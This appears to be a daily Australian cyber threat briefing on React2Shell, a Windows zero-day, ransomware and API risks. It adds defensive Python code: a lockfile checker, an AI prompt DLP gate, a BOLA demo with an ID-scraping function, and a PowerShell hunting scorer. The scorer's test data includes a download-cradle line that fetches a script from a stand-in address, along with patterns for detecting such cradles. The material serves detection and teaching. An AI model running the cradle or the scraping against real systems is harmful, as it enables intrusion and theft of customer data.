Daily Threat Briefing: Australia – 12 December 2025

Executive Summary

The Australian cyber threat landscape over the last 24 hours has been dominated by the critical "React2Shell" vulnerability and the fallout from December's Patch Tuesday. State-sponsored actors and ransomware groups are moving quickly to exploit these new vectors. Separately, a new report highlights a sharp rise in data leakage through enterprise AI tools, with heavy impact on the Australian SaaS and FinTech sectors.

Top Critical Vulnerabilities: Immediate Action Required

  • "React2Shell" (CVE-2025-55182) – CVSS 10.0

    • The Threat: A pre-authentication Remote Code Execution (RCE) vulnerability in React Server Components, reachable by an unauthenticated attacker sending a crafted request to an RSC endpoint. It affects React 19.x (the react-server-dom-* packages) and the Next.js 15.x/16.x releases that bundle them.
    • Status: Active Exploitation. China-nexus threat groups (Earth Lamia, Jackpot Panda) and Mirai botnet variants are scanning for and exploiting this flaw across Australian web assets.
    • Action: Patch to a fixed React/Next.js release immediately; a WAF rule is a stop-gap that buys time for patching, not a substitute. Any organisation running Next.js App Router (which is built on React Server Components), or any other framework that ships RSC, is in scope. Because exploitation began before most organisations patched, treat exposed servers as potentially compromised and hunt for post-exploitation activity rather than assuming the patch closed the matter.
  • Microsoft Zero-Day (CVE-2025-62221) – CVSS 7.8

    • The Threat: A use-after-free Elevation of Privilege vulnerability in the Windows Cloud Files Mini Filter Driver (cldflt.sys). It is a local bug: an attacker who already has code execution on the host uses it to escalate to SYSTEM, so it is chained after phishing or an RCE rather than used for initial access.
    • Status: Confirmed exploitation in the wild. Attackers are using it to gain SYSTEM privileges on endpoints they have already compromised.
    • Action: Apply the December 2025 Patch Tuesday updates immediately, prioritising user endpoints, where a local privilege escalation is most useful to an attacker.
  • Google Chrome Zero-Day

    • Google issued an emergency Chrome update on 11 December for a new zero-day that is being actively exploited. Ensure all browser instances are updated to the latest stable channel, and note that other Chromium-based browsers (Microsoft Edge, for example) receive the same fix through their own vendor updates, which may lag Chrome's release.
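A quick way to confirm React2Shell exposure is to check the lockfile rather than the version ranges in package.json, because the vulnerable code sits in the react-server-dom-* packages that Next.js pulls in transitively. The checker below is an added example, not code from the briefing or from the React or Next.js projects. The fixed-version table in FIXED is my reading of the vendor advisories and must be confirmed against the React and Next.js security advisories before the output is trusted; the sample lockfile is constructed.

```python
"""Flag React2Shell (CVE-2025-55182) exposure from an npm lockfile.

Added example, not from the briefing or the React/Next.js projects. The
fixed-version table is an ASSUMPTION taken from the vendor advisories as
understood at time of writing; confirm it against the React and Next.js
security advisories before relying on the output.
"""
import json
import re

# ASSUMPTION: first fixed patch level per affected minor line. Any release in
# that minor line below the listed patch level is treated as vulnerable.
_RSD_FIXED = {(19, 0): 1, (19, 1): 2, (19, 2): 1}
FIXED = {
    "react-server-dom-webpack": _RSD_FIXED,
    "react-server-dom-parcel": _RSD_FIXED,
    "react-server-dom-turbopack": _RSD_FIXED,
    "next": {(15, 0): 5, (15, 1): 9, (15, 2): 6, (15, 3): 6,
             (15, 4): 8, (15, 5): 7, (16, 0): 7},
}

_VER = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-(.+))?$")


def parse_version(version):
    """Return (major, minor, patch, prerelease_or_None), or None if unparseable."""
    m = _VER.match(version.strip())
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4)


def assess(name, version):
    """Classify name@version as 'vulnerable', 'fixed' or 'review'; None if the
    package is not in scope. 'review' means a pre-release (e.g. a canary) or a
    minor line the table does not cover, which needs a manual advisory check."""
    thresholds = FIXED.get(name)
    if thresholds is None:
        return None
    parsed = parse_version(version)
    if parsed is None or parsed[3] is not None:
        return "review"
    major, minor, patch, _ = parsed
    fixed_patch = thresholds.get((major, minor))
    if fixed_patch is None:
        # Major versions older than the affected range never shipped the flaw.
        oldest_affected_major = min(mj for mj, _ in thresholds)
        return "fixed" if major < oldest_affected_major else "review"
    return "fixed" if patch >= fixed_patch else "vulnerable"


def scan_lockfile(lock):
    """Walk the 'packages' map of a package-lock.json (lockfileVersion 2 or 3)
    and return [(path, name, version, status)] for in-scope packages, including
    nested copies under another dependency's node_modules."""
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if not path:  # "" is the root project entry
            continue
        name = path.rsplit("node_modules/", 1)[-1]
        version = meta.get("version", "")
        status = assess(name, version)
        if status is not None:
            findings.append((path, name, version, status))
    return findings


# Constructed sample lockfile, not a real project.
SAMPLE_LOCK = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/next": {"version": "15.5.6"},
        "node_modules/react": {"version": "19.2.0"},
        "node_modules/react-server-dom-webpack": {"version": "19.2.0"},
        "node_modules/some-lib/node_modules/next": {"version": "16.0.7"},
        "node_modules/react-server-dom-turbopack": {"version": "19.3.0-canary.1"},
    },
}

if __name__ == "__main__":
    import sys
    lock = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_LOCK
    for path, name, version, status in scan_lockfile(lock):
        print(f"{status:10s} {name}@{version}  ({path})")
```

Run it against each application's package-lock.json (`python react2shell_check.py path/to/package-lock.json`); a 'vulnerable' hit on any nested copy counts, since a bundler will happily ship a stale transitive copy even when the top-level package is current.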

Sector-Specific Updates

Healthcare & Pharma

  • Inotiv Ransomware Incident: Pharmaceutical research firm Inotiv has confirmed a significant breach attributed to the Qilin ransomware group. Data relating to clinical research, and potentially to sensitive patient cohorts, has been exfiltrated. This fits the broader trend in which healthcare remains the most breached sector in Australia for 2025.
  • Guidance: Keep backups offline or immutable and review third-party vendor connections (remote-support, managed-service and VPN access in particular), as supply chain compromise is the primary vector for Qilin.

SaaS & AI Providers

  • AI Data Leakage Surge: A report released yesterday finds that 1 in 35 enterprise prompts sent to Generative AI tools now contains sensitive data (PII, source code or internal credentials).
  • SaaS Impact: Australian SaaS providers are urged to implement strict "AI DLP" (Data Loss Prevention) controls that inspect prompts before they leave the organisation, not only written policy. Unmonitored use of AI copilots is currently the fastest-growing shadow IT risk.
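One concrete form of an "AI DLP" control is a pre-send gate that inspects each prompt and then blocks it, redacts it, or lets it through. The following is an added example, not from the briefing or the report it cites. The secret patterns are illustrative rather than exhaustive, the TFN check uses the ATO's published weighted modulus-11 algorithm, and the sample prompts are constructed (the AWS key is Amazon's own documentation example).

```python
"""Pre-send DLP gate for Generative AI prompts.

Added example, not from the briefing. Patterns are illustrative; the TFN
check is the ATO weighted modulus-11 algorithm for 9-digit TFNs. Sample
prompts are constructed.
"""
import re

# Credential patterns. Matching any of these blocks the prompt outright.
CREDENTIAL_PATTERNS = {
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH |)PRIVATE KEY-----"),
    "github_token": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
}
# Tokens and PII. Matching these redacts rather than blocks.
REDACT_PATTERNS = {
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\b"),
}
TFN_CANDIDATE = re.compile(r"\b\d{3}[ -]?\d{3}[ -]?\d{3}\b")
TFN_WEIGHTS = (1, 4, 3, 7, 5, 8, 6, 9, 10)


def is_valid_tfn(digits):
    """Australian TFN check digit: weighted sum of the 9 digits divisible by 11.
    A 9-digit number that fails this is almost certainly an invoice or phone
    number, which is what keeps the false-positive rate usable."""
    if len(digits) != 9 or not digits.isdigit():
        return False
    return sum(int(d) * w for d, w in zip(digits, TFN_WEIGHTS)) % 11 == 0


def scan_prompt(text):
    """Return [(label, matched_text)] for every sensitive item found."""
    findings = []
    for patterns in (CREDENTIAL_PATTERNS, REDACT_PATTERNS):
        for label, rx in patterns.items():
            findings.extend((label, m.group(0)) for m in rx.finditer(text))
    for m in TFN_CANDIDATE.finditer(text):
        if is_valid_tfn(re.sub(r"[ -]", "", m.group(0))):
            findings.append(("au_tfn", m.group(0)))
    return findings


def redact(text, findings):
    """Replace each matched value with a labelled placeholder."""
    for label, value in findings:
        text = text.replace(value, f"[REDACTED:{label}]")
    return text


def gate_prompt(text):
    """Policy decision for one prompt.
    Returns (decision, text_to_send_or_None, findings) where decision is
    'block' (a credential is present), 'redact' (PII or a token was masked)
    or 'allow'."""
    findings = scan_prompt(text)
    if any(label in CREDENTIAL_PATTERNS for label, _ in findings):
        return "block", None, findings
    if findings:
        return "redact", redact(text, findings), findings
    return "allow", text, findings


# Constructed prompts: a TFN, an AWS documentation key, and two clean ones
# (the second contains a 9-digit number that fails the TFN check digit).
SAMPLE_PROMPTS = [
    "Summarise this customer note: TFN 123 456 782, wants a refund.",
    "Why does boto3 fail with AKIAIOSFODNN7EXAMPLE? Here is my config...",
    "Rewrite this SQL: SELECT id FROM orders WHERE total > 100",
    "Invoice ref 123 456 789 is overdue, draft a reminder.",
]

if __name__ == "__main__":
    for prompt in SAMPLE_PROMPTS:
        decision, outgoing, findings = gate_prompt(prompt)
        print(f"{decision:7s} {[label for label, _ in findings]}  -> {outgoing!r}")
```

The gate runs where prompts leave the tenant (a proxy in front of the AI vendor's API, or the browser extension's outbound hook), and the decision plus the labels, never the matched values themselves, is what gets logged.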

Government & Education

  • Services Australia Data Governance: Following a spike in data breaches involving Medicare and Centrelink credentials, the Federal Government is reviewing new powers to force rapid disclosure from third-party providers. Agencies should prepare for stricter compliance reporting requirements.
  • Education Sector Targeting: Australian universities continue to face high volumes of brute-force attacks against authentication gateways, with recent incidents at UWA highlighting the fragility of password-only defences. Phishing-resistant MFA, account lockout and rate limiting on those gateways are the direct mitigations.

FinTech & eCommerce

  • API Security Crisis: With 95% of Australian organisations reporting an API security incident this year, FinTechs are the prime target. Recent attacks have shifted from simple injection to Broken Object Level Authorization (BOLA): an attacker with one valid login substitutes other customers' account or transaction identifiers into otherwise legitimate API calls, and an endpoint that authenticates the caller but never checks ownership of the requested object hands back their financial data. Sequential or guessable identifiers make the scraping trivial to automate.
  • Threat Actor Watch: The Kairos ransomware group is actively targeting mid-tier Australian financial services firms, using misconfigured cloud APIs for initial access.
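The BOLA pattern described above, as an added example that is not from the briefing: an account-transactions handler that checks authentication but not object ownership, the hardened version beside it, and the enumeration an attacker runs against each with a single legitimate login. The account store, subject names and request shape are constructed for illustration.

```python
"""BOLA (Broken Object Level Authorization): vulnerable handler beside the
hardened one, plus the ID-space walk an attacker runs against each.

Added example, not from the briefing. The account store, subject names and
request shape are constructed for illustration.
"""
from dataclasses import dataclass, field


@dataclass
class Account:
    account_id: int
    owner: str                     # authenticated subject (e.g. a token's 'sub')
    transactions: list = field(default_factory=list)


# Constructed store with sequential IDs, as many production APIs still use.
ACCOUNTS = {
    1001: Account(1001, "alice", [("2025-12-10", -42.50), ("2025-12-11", 1500.00)]),
    1002: Account(1002, "bob", [("2025-12-09", -9.99)]),
    1003: Account(1003, "carol", [("2025-12-11", -300.00)]),
}


class NotFound(Exception):
    """Maps to HTTP 404. The hardened handler raises it for both 'no such
    account' and 'not your account', so responses do not reveal which IDs exist."""


def get_transactions_vulnerable(subject, account_id):
    """BOLA: authentication is enforced (subject must be set), but ownership of
    the requested object never is. Any logged-in user can read any account."""
    if not subject:
        raise PermissionError("unauthenticated")
    acct = ACCOUNTS.get(account_id)
    if acct is None:
        raise NotFound()
    return acct.transactions


def get_transactions_hardened(subject, account_id):
    """Object-level check: fetch, then require acct.owner == subject. Deriving
    the permitted set from the authenticated identity rather than from the
    request is the fix; the identical 404 for missing and foreign accounts is
    the anti-enumeration detail."""
    if not subject:
        raise PermissionError("unauthenticated")
    acct = ACCOUNTS.get(account_id)
    if acct is None or acct.owner != subject:
        raise NotFound()
    return acct.transactions


def access_allowed(handler, subject, account_id):
    """True if the handler returns data for this subject/ID pair."""
    try:
        handler(subject, account_id)
        return True
    except (NotFound, PermissionError):
        return False


def scrape(handler, subject, id_range):
    """What an attacker does with one valid login: walk the ID space and keep
    whatever the endpoint hands back. Returns {account_id: transactions}."""
    leaked = {}
    for account_id in id_range:
        try:
            leaked[account_id] = handler(subject, account_id)
        except (NotFound, PermissionError):
            continue
    return leaked


if __name__ == "__main__":
    for label, handler in (("vulnerable", get_transactions_vulnerable),
                           ("hardened", get_transactions_hardened)):
        leaked = scrape(handler, "bob", range(1000, 1010))
        print(f"{label:10s} bob's single login exposes accounts {sorted(leaked)}")
```

In a real service the same check belongs in the data-access layer (a query scoped by the authenticated subject) rather than repeated in every handler, so a new endpoint cannot forget it; the handler-level form here is just the smallest thing that shows the defect.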

IoT & Critical Infrastructure

  • Satellite Supply Chain: New vulnerabilities in satellite ground control software have prompted South Australian researchers to release specialised defence tools. Operators in the space and defence supply chain (including those connected to the REDBACK program) must heighten vigilance against espionage-focused groups such as Cyber Toufan.

Threat Actor Focus: Qilin & Earth Lamia

  • Qilin: Currently aggressive in the healthcare space, utilising double-extortion tactics. They are known to weaponise stolen data quickly if ransoms are not paid.
  • Earth Lamia: A state-sponsored group rapidly operationalising the React2Shell vulnerability to establish persistence in critical networks before patches can be applied.

Recommendation

Organisations must pivot from reactive patching to proactive threat hunting. With vulnerabilities like React2Shell allowing pre-auth RCE, perimeter defences are being bypassed in minutes, so applying the patch does not answer whether a host was already exploited. Ensure your EDR and SIEM are tuned to detect post-exploitation behaviour, particularly "living-off-the-land" techniques that abuse PowerShell (also relevant to the newly patched CVE-2025-54100): encoded commands, download cradles, hidden windows and in-memory execution are the signals to hunt for.
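As an added example (not from the briefing, and not a detection for CVE-2025-54100 specifically), the following scores PowerShell process-creation (4688) and script-block (4104) events for common living-off-the-land signals. An -EncodedCommand payload is decoded from UTF-16LE base64 and inspected in place of the raw blob, so cradles hidden behind encoding are still caught. The event texts are constructed; 198.51.100.7 is a documentation-range address, and the indicator weights are illustrative tuning rather than any standard.

```python
"""Score PowerShell events for living-off-the-land (LOTL) indicators.

Added example, not from the briefing and not a detection for CVE-2025-54100
specifically. Event texts are constructed; 198.51.100.7 is a
documentation-range address. Weights are illustrative tuning.
"""
import base64
import re

# -EncodedCommand and its accepted abbreviations, followed by a base64 blob.
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# (name, pattern, weight)
INDICATORS = [
    ("invoke_expression", re.compile(r"\biex\b|invoke-expression", re.I), 3),
    ("download_cradle", re.compile(
        r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I), 3),
    ("base64_decode", re.compile(r"frombase64string", re.I), 2),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("in_memory_load", re.compile(r"reflection\.assembly|\[system\.reflection", re.I), 2),
    ("no_profile", re.compile(r"-nop\b|-noprofile\b", re.I), 1),
    ("policy_bypass", re.compile(r"-ep\s+bypass|-exec(?:utionpolicy)?\s+bypass", re.I), 1),
]


def ps_encode(script):
    """Produce what PowerShell expects after -EncodedCommand: UTF-16LE, base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def ps_decode(blob):
    """Reverse ps_encode; None if the blob is not valid UTF-16LE base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
        return None


def analyse(event):
    """Return (score, indicator_names, decoded_script_or_None) for one event.
    The base64 blob is swapped for its decoded form before matching, so
    encoded cradles are caught and the raw blob cannot produce false hits."""
    text = event["text"]
    score, hits, decoded = 0, [], None
    m = ENC_FLAG.search(text)
    if m:
        score += 3
        hits.append("encoded_command")
        decoded = ps_decode(m.group(1))
        text = text.replace(m.group(1), decoded or "<undecodable>")
    for name, rx, weight in INDICATORS:
        if rx.search(text):
            score += weight
            hits.append(name)
    return score, hits, decoded


def hunt(events, threshold=5):
    """Return [(index, score, indicators, decoded)] for events at/above threshold."""
    alerts = []
    for i, ev in enumerate(events):
        score, hits, decoded = analyse(ev)
        if score >= threshold:
            alerts.append((i, score, hits, decoded))
    return alerts


# Constructed sample: an encoded download cradle, routine admin activity, an
# in-script decode-and-eval, and a benign scheduled script using -ExecutionPolicy Bypass.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage.ps1')"
EVENTS = [
    {"event_id": 4688, "text": "powershell.exe -nop -w hidden -enc " + ps_encode(STAGER)},
    {"event_id": 4104, "text": "Get-ChildItem C:\\Logs | Where-Object Length -gt 10MB"},
    {"event_id": 4104, "text": "$b=[Convert]::FromBase64String($s); Invoke-Expression "
                               "([Text.Encoding]::Unicode.GetString($b))"},
    {"event_id": 4688, "text": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1"},
]

if __name__ == "__main__":
    for i, score, hits, decoded in hunt(EVENTS):
        print(f"event[{i}] score={score} indicators={hits}")
        if decoded:
            print(f"  decoded: {decoded}")
```

The threshold is what keeps the benign -ExecutionPolicy Bypass of a scheduled task below the alert line while the decode-and-eval script block crosses it; in production the same scoring would be fed from Sysmon or Security log exports with the parent process (a web server worker spawning powershell.exe, for instance) added as a further weighted indicator.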

Contact us for a quote for penetration testing service or adversary simulation.